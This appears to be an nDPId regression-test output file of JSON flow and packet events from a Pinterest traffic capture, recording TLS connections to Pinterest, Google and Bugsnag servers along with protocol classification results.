+02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} 
+00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gCIReACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC5WYBu2PBi7kDA7Y3gBAB9bhLAAABAQgKDEf\/5cK4cls="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714251,"flow_last_seen":1605289714251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714251,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605289714251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714251,"pkt":"qtsDr8lk5EKm5WPyht1gCQO3ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RPih0IBu\/o5BzSfc9\/MgBAB9chlAAABAQgK4ziLg8K4a4Y="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714281,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBhOqRBG+Jl1nfgBAm9NLhAAABAQgKwrkiYM+oHbQ="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvlZgMDtjdjwYu6gBAMIRHEAAABAQgKwrkiZwxF7DU="} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAKzZE+IqAcsBIEmLB5kd7IUo3\/YpAbuHQp9z38z6OQc1gBALjSOBAAABAQgKwrkiaOM2b+4="} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714558,"flow_last_seen":1605289714558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714558,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} 
+00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} +00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} 
